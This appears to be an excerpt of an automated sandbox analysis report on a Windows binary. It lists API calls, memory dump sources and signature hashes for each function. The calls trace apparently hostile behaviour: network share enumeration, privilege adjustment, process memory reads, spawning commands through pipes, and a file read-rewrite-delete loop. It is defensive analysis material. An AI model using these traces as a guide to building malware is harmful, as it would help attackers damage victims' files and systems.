      • WSAAddressToStringW.WS2_32(?,00000010,00000000,?,?), ref: 000D20F9
      • WNetUseConnectionW.MPR(00000000,?,00000000,00000000,00000000,00000000,00000000,?), ref: 000D2126
        • Part of subcall function 000D1E10: WNetOpenEnumW.MPR(00000000,00000000,00000000,00000000,?), ref: 000D1E66
        • Part of subcall function 000D1E10: WNetEnumResourceW.MPR(?,?,00000000,?), ref: 000D1E83
        • Part of subcall function 000D1E10: WNetEnumResourceW.MPR(?,?,?,?), ref: 000D2046
        • Part of subcall function 000D1E10: WNetCloseEnum.MPR(?), ref: 000D205E
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Enum$Resource$AddressCloseConnectionOpenString
      • String ID: \\e-
      • API String ID: 2373711962-2557246277
      • Opcode ID: abf68575c731af063cffe02b6caf7cec889decf1f8e71230d1d77e4afdc1d7a6
      • Instruction ID: 2e5790d2426149838747d79e5fe9d8750575bfb3569dc8aab1fcad6156fbd9d6
      • Opcode Fuzzy Hash: abf68575c731af063cffe02b6caf7cec889decf1f8e71230d1d77e4afdc1d7a6
      • Instruction Fuzzy Hash: B4214F72508305AFE700DFA9CC8599BB7EDFF49714F00492EFA94C6251E771E6188B92
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 000D24F8
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocCreateProcessThread
      • String ID: $-"$"
      • API String ID: 490627656-2688294569
      • Opcode ID: 0be8e975c972fd695682ec75f4029ea86d211405e0f871e0de410b55f4b7f94a
      • Instruction ID: f894673c19b1562c32577b2029975ad8bd6c51f4faead11eab22dffdcd8ccedd
      • Opcode Fuzzy Hash: 0be8e975c972fd695682ec75f4029ea86d211405e0f871e0de410b55f4b7f94a
      • Instruction Fuzzy Hash: 69F01CB1214609AFCB08CF55E845C5B7BE9EF88310B14C66AF90C8B225D234D8518BA0
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • GetTickCount.KERNEL32 ref: 00202A94
      • GetLocaleInfoW.KERNEL32(00000800,00000058,?,00000020), ref: 00202AB4
      • Sleep.KERNEL32(00001388), ref: 00202B9D
      • Sleep.KERNEL32(00000064), ref: 00202C53
      • Sleep.KERNEL32(00001388), ref: 00202C82
      • CreateThread.KERNEL32(00000000,00000000,0020239A,?,00000000,00000000), ref: 00202D55
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00202E45
        • Part of subcall function 00204F7A: ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,00202C6F,00000001), ref: 00204F95
        • Part of subcall function 00204F7A: CloseHandle.KERNEL32(?,?,00202C6F,00000001), ref: 00204F9E
      • EnterCriticalSection.KERNEL32(?), ref: 00202EA7
      • LeaveCriticalSection.KERNEL32(?), ref: 00202EB4
      • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF), ref: 00202ECF
      • CloseHandle.KERNEL32(?), ref: 00202EE6
        • Part of subcall function 0020489E: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,00000000), ref: 00204908
        • Part of subcall function 0020489E: CloseHandle.KERNEL32(?), ref: 0020491E
        • Part of subcall function 0020489E: CloseHandle.KERNEL32(?), ref: 00204923
      • EnterCriticalSection.KERNEL32(?), ref: 00202F13
      • CloseHandle.KERNEL32(?), ref: 00202F22
      • CloseHandle.KERNEL32(?), ref: 00202F31
      • DeleteCriticalSection.KERNEL32(?), ref: 00202F38
      • ReleaseMutex.KERNEL32(?), ref: 00202F83
      • CloseHandle.KERNEL32(?), ref: 00202F8D
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CriticalSection$Sleep$CreateEnterMutexReleaseWait$CountDeleteInfoLeaveLocaleMultipleObjectObjectsProcessSingleThreadTick
      • String ID:
      • API String ID: 2025543672-0
      • Opcode ID: 59d87423b41de68854fc1906cfe4fbea93fc60140ece3ebdc6b5b13815002ee9
      • Instruction ID: 0a008a62ec60bc33101834281e30b44b2cb86788a986e11cfe6a2532b4650b1a
      • Opcode Fuzzy Hash: 59d87423b41de68854fc1906cfe4fbea93fc60140ece3ebdc6b5b13815002ee9
      • Instruction Fuzzy Hash: DFF1A172528343EFDB20AF64D889A1EB7E5AF84710F54092FF684921D3DB70DD688B52
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,00000000,?,00000000,?,?,00202AF6), ref: 0020279B
      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,00000000,?,00000000,?,?,00202AF6,00000000,?), ref: 002027B8
      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,00000000,?,?,00202AF6,00000000,?), ref: 002027E3
      • ReadFile.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000000,?,00000000,?,?,00202AF6,00000000,?), ref: 002027F5
      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?,00202AF6,00000000), ref: 00202813
      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00202AF6,00000000,?), ref: 00202830
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$HeapPointer$AllocByteCharCloseCreateHandleMultiProcessReadWide
      • String ID:
      • API String ID: 2550576714-0
      • Opcode ID: f5f2cac03f5d45a0e315196062a5ac58de961294a84a38882fa4634be194b0e7
      • Instruction ID: f3e7af4ebb6ad435612f0a02f9f8598461719f58963887600bbf7e6d5bed0c14
      • Opcode Fuzzy Hash: f5f2cac03f5d45a0e315196062a5ac58de961294a84a38882fa4634be194b0e7
      • Instruction Fuzzy Hash: 86418175D10319FBDB216FA59C89DAFBBB9EF85710F20412AF500A10D3E6314EA5CAA0
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • GetVersion.KERNEL32(?,00202B0D), ref: 00203E42
      • GetCurrentProcess.KERNEL32(00000008,?), ref: 00203E58
      • OpenProcessToken.ADVAPI32(00000000), ref: 00203E5F
      • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00203E7D
      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00203E93
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpenVersion
      • String ID:
      • API String ID: 4059737031-0
      • Opcode ID: 3795785f40c103a975d067e81bec8bad4fa0d06509cbfe50c7c9570aaa0c625f
      • Instruction ID: 049808652ab30ccf858a3e2c211cd5ab6be4a25257aba9c5a094771c202f1e71
      • Opcode Fuzzy Hash: 3795785f40c103a975d067e81bec8bad4fa0d06509cbfe50c7c9570aaa0c625f
      • Instruction Fuzzy Hash: EDF0F672910318EBDB11DBA4EC09B9EB77DAF04701F50426AE606E2092D7709B549B91
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
        • Part of subcall function 00203C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,002028D8,00000000,00000000), ref: 00203CA2
      • OpenMutexW.KERNEL32(00100000,00000000,00000000,?,?,00000000,00000000), ref: 00204F1E
      • CreateMutexW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 00204F2D
      • WaitForSingleObject.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00204F3C
      • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 00204F56
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Mutex$CloseCreateHandleInformationObjectOpenSingleVolumeWait
      • String ID:
      • API String ID: 1595014494-0
      • Opcode ID: 79723d3f52d3228d3df04d38994771a770448921f2d468d16c1216eaea26baa0
      • Instruction ID: 0bf99c5de806daba4d8a46e73c3b91d3f6c1e2b643e089e4537e9eb889c3895c
      • Opcode Fuzzy Hash: 79723d3f52d3228d3df04d38994771a770448921f2d468d16c1216eaea26baa0
      • Instruction Fuzzy Hash: C821B2B5A1030DAFCB10AFA0DC8999DBBF9FB84344F608439F645E7282DA709D658F10
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
        • Part of subcall function 00204EA5: OpenMutexW.KERNEL32(00100000,00000000,00000000,?,?,00000000,00000000), ref: 00204F1E
        • Part of subcall function 00204EA5: CreateMutexW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 00204F2D
        • Part of subcall function 00204EA5: WaitForSingleObject.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00204F3C
        • Part of subcall function 00204EA5: CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 00204F56
      • ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,00202C6F,00000001), ref: 00204F95
      • CloseHandle.KERNEL32(?,?,00202C6F,00000001), ref: 00204F9E
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Mutex$CloseHandle$CreateObjectOpenReleaseSingleWait
      • String ID:
      • API String ID: 2599181272-0
      • Opcode ID: 8bee79aec459b1dd2adf6f6a06ac072569812e10d2a78dba4025f2b8e5e825ba
      • Instruction ID: 73f9b30f25896bdd7b121c324f5e0492f9b1c5702ebc3344b10924a816da11bd
      • Opcode Fuzzy Hash: 8bee79aec459b1dd2adf6f6a06ac072569812e10d2a78dba4025f2b8e5e825ba
      • Instruction Fuzzy Hash: 4DD012B2910329FFDF116B94EC0E88DBB29EF007647104151F90562171D771AE249BD0
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
        • Part of subcall function 002029F5: GetTickCount.KERNEL32 ref: 00202A94
        • Part of subcall function 002029F5: GetLocaleInfoW.KERNEL32(00000800,00000058,?,00000020), ref: 00202AB4
      • ExitProcess.KERNEL32 ref: 00202FAE
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CountExitInfoLocaleProcessTick
      • String ID:
      • API String ID: 1528680899-0
      • Opcode ID: 7ccd0ef1aec372bde666407a82e74cc03d94096ae75b6cc0d7e6847de9ccb7a4
      • Instruction ID: 94fcb532c2e2ec1675119eb58aefc4a9ac97d1a7d86994664056c69a696b25ce
      • Opcode Fuzzy Hash: 7ccd0ef1aec372bde666407a82e74cc03d94096ae75b6cc0d7e6847de9ccb7a4
      • Instruction Fuzzy Hash: 4A900221154319D6E2C06764680E70825115705706F914101B145540D35D5000145922
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,002028D8,00000000,00000000), ref: 00203CA2
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: InformationVolume
      • String ID:
      • API String ID: 2039140958-0
      • Opcode ID: 92b8012519a14ae953a1e63b433c5cf4513c8a285c8b7240b054231002a69a9d
      • Instruction ID: c6f618dcd90350fbd3b28bbcde48b9bf7d947b91d983ce1c6ede3da5062c3147
      • Opcode Fuzzy Hash: 92b8012519a14ae953a1e63b433c5cf4513c8a285c8b7240b054231002a69a9d
      • Instruction Fuzzy Hash: 24E0EC72511224BDE7249B569D4ACFF7F7CDE82674710005AF405D6142E6706F11D5F1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetCurrentProcess.KERNEL32(00000020,+# ,00000000,?,?,?,?,?,?,?,?,0020232B,00000000), ref: 00203DD5
      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,0020232B,00000000), ref: 00203DDC
      • LookupPrivilegeValueW.ADVAPI32(00000000,+# ,?), ref: 00203DEE
      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0020232B), ref: 00203E1D
      • CloseHandle.KERNEL32(+# ,?,?,?,?,?,?,?,0020232B,00000000), ref: 00203E2D
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
      • String ID: +# $+#
      • API String ID: 3038321057-2392861765
      • Opcode ID: 59dd36377d9864a1cac37a7dff00ae876eae2827562ce52f0462b1eb839ccf43
      • Instruction ID: 5b832b76e2063f429f34a188eed014976b616c46490b195da9693a94102501c8
      • Opcode Fuzzy Hash: 59dd36377d9864a1cac37a7dff00ae876eae2827562ce52f0462b1eb839ccf43
      • Instruction Fuzzy Hash: A0012576900329ABCB10DFA5EC4CAEFBFBDEF48310F004026EA05E2151D7348644CBA1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • FindFirstFileW.KERNEL32(00000000,?,?,00000000,-00000002,00000002), ref: 00205DC6
      • FindNextFileW.KERNEL32(00000000,?,?,00000000,-00000002,00000002), ref: 00205E9C
      • FindClose.KERNEL32(00000000,?,00000000,-00000002,00000002), ref: 00205EAD
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Find$FileHeap$AllocCloseFirstNextProcess
      • String ID: .$.
      • API String ID: 719300460-3769392785
      • Opcode ID: cdc7fe7cc3dbe5e76d33088458de4dc65481fe7801611650f92b312aa4aa57c2
      • Instruction ID: f1e1dd98f8953ee378389ba4992b948dfbb653ded6a2a5b2f713f3ac01cb91e2
      • Opcode Fuzzy Hash: cdc7fe7cc3dbe5e76d33088458de4dc65481fe7801611650f92b312aa4aa57c2
      • Instruction Fuzzy Hash: A0315A35821B29BACF21AFA0DC49AEF77B9AF04311F148055F905A20D3E7758BA48E91
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
        • Part of subcall function 00203D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,002048E0,?), ref: 00203D8C
        • Part of subcall function 00203D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 00203DA1
      • CreatePipe.KERNEL32(?,?,?,00000000), ref: 00204C1D
      • CreatePipe.KERNEL32(?,?,?,00000000), ref: 00204C37
      • SetHandleInformation.KERNEL32(?,00000001,00000000), ref: 00204C4D
      • SetHandleInformation.KERNEL32(?,00000001,00000000), ref: 00204C5D
      • CreateProcessW.KERNEL32 ref: 00204CB3
      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00204CD4
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00204CE0
      • CloseHandle.KERNEL32(?), ref: 00204D07
      • CloseHandle.KERNEL32(?), ref: 00204D13
      • CloseHandle.KERNEL32(?), ref: 00204D22
      • CloseHandle.KERNEL32(?), ref: 00204D2E
      • CloseHandle.KERNEL32(?), ref: 00204D3A
      • CloseHandle.KERNEL32(?), ref: 00204D46
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$Close$Create$InformationPipe$AddressFileModuleObjectProcProcessSingleWaitWrite
      • String ID: D
      • API String ID: 4141597255-2746444292
      • Opcode ID: 60ce60ee395f995a5b5fee4cb0e2aea94b90c9eac16370c7b85944b3f57c1032
      • Instruction ID: d778dc9fda0c595201148464e1638a6663d8c60f173f544e5f9e8f422b0250e2
      • Opcode Fuzzy Hash: 60ce60ee395f995a5b5fee4cb0e2aea94b90c9eac16370c7b85944b3f57c1032
      • Instruction Fuzzy Hash: 32514BB2419346AFD711EF61DC44D9BBBECEF84760F004A2EB598821A1DB30D914CBA2
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • GetModuleHandleA.KERNEL32(00000000,00000001,74DF35B0,00000208,00000000), ref: 00203F86
      • GetProcAddress.KERNEL32(00000000), ref: 00203F8F
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 00203F98
      • GetProcAddress.KERNEL32(00000000), ref: 00203F9B
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 00203FA4
      • GetProcAddress.KERNEL32(00000000), ref: 00203FA7
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 00203FB0
      • GetProcAddress.KERNEL32(00000000), ref: 00203FB3
      • GetCurrentProcessId.KERNEL32 ref: 00203FE6
      • OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 00203FF3
      • ReadProcessMemory.KERNEL32(00000000,?,?,00000020,00000000), ref: 0020402C
      • ReadProcessMemory.KERNEL32(000000FF,?,?,00000030,00000000), ref: 00204046
      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0020407D
      • ReadProcessMemory.KERNEL32(000000FF,?,?,00000004,00000000), ref: 0020409A
      • ReadProcessMemory.KERNEL32(000000FF,?,?,?,00000000), ref: 002040B6
      • CloseHandle.KERNEL32(000000FF), ref: 00204104
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Process$HandleModule$AddressMemoryProcRead$CloseCurrentFileNameOpen
      • String ID:
      • API String ID: 754965762-0
      • Opcode ID: ec65de4955daee5783fd3c3a9946c85f075cf4a2e56ddaf08f9f565030256ea5
      • Instruction ID: 28cd06c6c0cfae5b3f984126293742e0f04bae7fbf66da5121b720f3fc8c2f0c
      • Opcode Fuzzy Hash: ec65de4955daee5783fd3c3a9946c85f075cf4a2e56ddaf08f9f565030256ea5
      • Instruction Fuzzy Hash: A8713AB1D1020AAFDF10AFA4DC48EEEBBB9EF48300F144056FA05B2192D7759A55CFA1
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      control_flow_graph 397 208782-2087cc call 208601 call 2090c6 402 2087e3-2087e7 397->402 403 2087ce-2087e1 397->403 404 2087e9-20880d GetFileAttributesW 402->404 403->404 405 208813-20881f GetFileAttributesW 404->405 406 208ae9-208af0 404->406 405->406 407 208825-208841 CreateFileW 405->407 407->406 408 208847-208864 SetFilePointerEx 407->408 409 208ab9-208ac8 CloseHandle 408->409 410 20886a-208870 408->410 412 208aca-208acd CloseHandle 409->412 413 208acf-208ad3 409->413 410->409 411 208876-208894 SetFilePointerEx 410->411 411->409 414 20889a-2088b9 CreateFileW 411->414 412->413 415 208ad5-208ad8 413->415 416 208ada-208ade 413->416 414->409 417 2088bf-2088d6 call 20669b 414->417 418 208ae3 DeleteFileW 415->418 416->406 419 208ae0 416->419 417->409 422 2088dc 417->422 418->406 419->418 423 208957-20896e ReadFile 422->423 424 208974 423->424 425 2088de-2088e4 423->425 426 208aa3-208ab6 call 208fa9 424->426 427 2088e6-20890a call 208fa9 425->427 428 20890d-208923 call 206432 425->428 426->409 427->428 428->426 435 208929-208940 WriteFile 428->435 435->426 436 208946-20894c 435->436 436->426 437 208952-208955 436->437 437->423 438 208979-208a1a call 208fd7 * 5 call 20669b 437->438 438->426 451 208a20-208a38 call 206432 438->451 451->426 454 208a3a-208a6a call 208fa9 WriteFile 451->454 454->426 457 208a6c-208a75 454->457 457->426 458 208a77-208a7b 457->458 459 208a86-208a8a 458->459 460 208a7d-208a85 call 2086b7 458->460 461 208a9c 459->461 462 208a8c-208a9a FlushFileBuffers * 2 459->462 460->459 461->426 462->461
      APIs
      • GetFileAttributesW.KERNEL32(?), ref: 002087F3
      • GetFileAttributesW.KERNEL32(?), ref: 00208816
      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00208835
      • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 0020885C
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 0020888C
      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,?,00000000), ref: 002088AD
      • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 00208938
      • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00208966
      • WriteFile.KERNEL32(00000002,00000000,?,?,00000000), ref: 00208A62
      • FlushFileBuffers.KERNEL32(F0A75E12), ref: 00208A95
      • FlushFileBuffers.KERNEL32(00000002), ref: 00208A9A
        • Part of subcall function 002086B7: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 002086EA
